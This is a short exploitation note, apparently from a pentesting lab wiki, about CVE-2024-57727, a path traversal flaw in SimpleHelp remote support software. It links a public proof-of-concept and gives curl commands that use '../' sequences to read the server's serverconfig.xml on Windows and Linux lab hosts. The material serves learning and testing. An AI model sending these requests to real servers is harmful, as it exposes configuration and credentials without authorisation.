Simplehelp CVE-2024-57727

SimpleHelp is a system that facilitates remote support, access, and work, among other uses. It is mainly used by IT professionals and support teams to allow them to support their users remotely. It can be installed on Linux, MS Windows, and macOS servers.

CVE-2024-57727 for SimpleHelp is a path traversal vulnerability.

After various vulnerabilities affecting other remote support and remote access software were discovered, Horizon3.ai was curious to check SimpleHelp’s software. In their blog post, they state to have discovered three vulnerabilities: CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728

Vulnerability Check

We can check this vulnerability by using this exploit https://github.com/imjdl/CVE-2024-57727

python poc.py http://10.10.161.39

Exploitation (Windows Server)

We can exploit this by getting serverconfig.xml file

curl --path-as-is http://10.10.161.39/toolbox-resource/../resource1/../../configuration/serverconfig.xml

now we are able to access files on the server.

Exploitation (Linux Server)

curl --path-as-is http://10.10.206.185/toolbox-resource/../secmsg/../../configuration/serverconfig.xml

PreviousEnumeration NextNext.js CVE-2025-29927

Last updated 2 months ago